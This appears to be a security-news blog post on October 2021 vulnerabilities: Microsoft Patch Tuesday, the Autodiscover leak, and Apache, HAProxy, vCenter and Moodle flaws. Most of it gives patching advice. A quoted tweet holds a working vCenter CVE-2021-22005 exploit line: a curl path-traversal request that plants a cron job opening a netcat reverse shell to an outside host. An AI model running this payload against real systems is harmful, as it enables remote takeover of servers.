Security News: Microsoft Patch Tuesday October 2021, Autodiscover, MysterySnail, Exchange, DNS, Apache, HAProxy, VMware vCenter, Moodle

Hello everyone! This episode will be about relatively recent critical vulnerabilities. Let's start with Microsoft Patch Tuesday for October 2021. Specifically, with the vulnerability that I expected there, but it didn't get there.

Autodiscover leak discovered by Guardicore Labs

"Autodiscover, a protocol used by Microsoft Exchange for automatic configuration of clients such as Microsoft Outlook, has a design flaw that causes the protocol to “leak” web requests to Autodiscover domains outside of the user’s domain but in the same TLD (i.e. Autodiscover.com)." Guardicore Labs acquired multiple Autodiscover domains and have captured 372,072 Windows domain credentials in total. It seems Microsoft have chosen to ignore this issue. No CVE, no Outlook or ActiveSync patches. The only fix is to ban the "Autodiscover." domains on devices.

Microsoft Patch Tuesday for October 2021

74 vulnerabilities: 1 Critical, 30 High, 43 Medium.

Elevation of Privilege - Windows Kernel (CVE-2021-40449)

It is a use-after-free vulnerability in the NtGdiResetDC function of the Win32k driver. A detailed technical description is available in Kasperky Securelist post, but, in short, the vulnerability can lead to leakage of kernel module addresses in the computer’s memory. This vulnerability is being exploited in the wild by APT MysterySnail. All servers and desktops should be updated.

Remote Code Execution - Microsoft Exchange Server (CVE-2021-26427)

It is necessary to update the Exchanges, but it's not very critical. "Despite the high CVSS score, the advisory does specifically point out that the vulnerability would only be exploitable from an adjacent network". There are no signs of exploitation or exploits yet. Three other vulnerabilities related to Exchange Server were also patched: CVE-2021-41350, a Spoofing vulnerability; CVE-2021-41348, allowing elevation of privilege; and CVE-2021-34453, which is a Denial of Service vulnerability.

Remote Code Execution - Windows DNS Server (CVE-2021-40469)

DNS servers need to be updated, but real exploitation is unlikely. It was categorized as “Exploitation Less Likely.” It received a CVSSv3 score of 7.2 because an attacker needs a privileged user account in order to exploit this across the network.

Remote Code Execution - Microsoft Word (CVE-2021-40486)

This is a good reason to check the Windows desktop updates. "This patch corrects a bug that would allow code execution when a specially crafted Word document is viewed on an affected system. Although Microsoft lists user interaction required, the Preview Pane is also listed as an attack vector." Also take a look at desktop vulnerability Spoofing - Windows Print Spooler (CVE-2021-36970), “Exploitation More Likely”.

And here you can get the whole Vulristics report for Microsoft Patch Tuesday October 2021.

Apache RCE with exploit (CVE-2021-41773)

Apache situation is like The Benny Hill Show. First, they released a new version (49) with a critical Path Traversal / RCE vulnerability CVE-2021-41773. Other versions were safe. Fortunately, this was revealed relatively quickly, in 2 weeks. The main stable distributions simply did not have time to add these packages to their repositories. Only fans of installing Apache from source and users of Slackware, Fedora and FreeBSD have suffered. And what was left for the victims to do? Obviously, hurry to roll the new safe version (50). But it turned out that the vulnerability in 50 was not completely fixed. And now the exploit Apache HTTP Server 2.4.50 - Path / Traversal & Remote Code Execution (RCE) is publicly available. Repeat the exercise comrades in rolling now version 51. Everything will definitely be fine there. It's just a circus.

HAProxy RCE with exploit (CVE-2021-40346)

A critical security vulnerability has been disclosed in HAProxy, a widely used open-source load balancer and proxy server, that could be abused by an adversary to possibly smuggle HTTP requests, resulting in unauthorized access to sensitive data and execution of arbitrary commands, effectively opening the door to an array of attacks. A public POC has appeared for the vulnerability.

VMware vCenter arbitrary file upload with public exploit

"On September 21, 2021, VMware disclosed that its vCenter Server is affected by an arbitrary file upload vulnerability—CVE-2021-22005—in the Analytics service. A malicious cyber actor with network access to port 443 can exploit this vulnerability to execute code on vCenter Server. On September 24, 2021, VMware confirmed reports that CVE-2021-22005 is being exploited in the wild. Security researchers are also reporting mass scanning for vulnerable vCenter Servers and publicly available exploit code. Due to the availability of exploit code, CISA expects widespread exploitation of this vulnerability".

> CVE-2021-22005: Exploitation in the wild confirmed. Unredacted RCE PoC against CEIP below.

curl -kv "https://172.16.57.2/analytics/telemetry/ph/api/hyper/send?_c=&amp;_i=/../../../../../../etc/cron.d/$RANDOM&quot; -H Content-Type: -d "* * * * * root nc -e /bin/sh 172.16.57.1 4444" <https://t.co/wi08brjl3r&gt; pic.twitter.com/bwjMA21ifA
>
> – wvu (@wvuuuuuuuuuuuuu) September 27, 2021

RCE exploits for Moodle

Several RCE exploits for Moodle were released on October 13.

1. 1337DAY-ID-36891 - Moodle Admin Shell Upload Exploit
2. 1337DAY-ID-36892 - Moodle SpellChecker Path Authenticated Remote Command Execution Exploit
3. 1337DAY-ID-36893 - Moodle Teacher Enrollment Privilege Escalation / Remote Code Execution Exploit
4. 1337DAY-ID-36894 - Moodle Authenticated Spelling Binary Remote Code Execution Exploit

"Moodle is a free and open-source learning management system. it is used for blended learning, distance education, flipped classroom and other e-learning projects in schools, universities, workplaces and other sectors". Surely some organizations make it available on the network perimeter and do not update it regularly.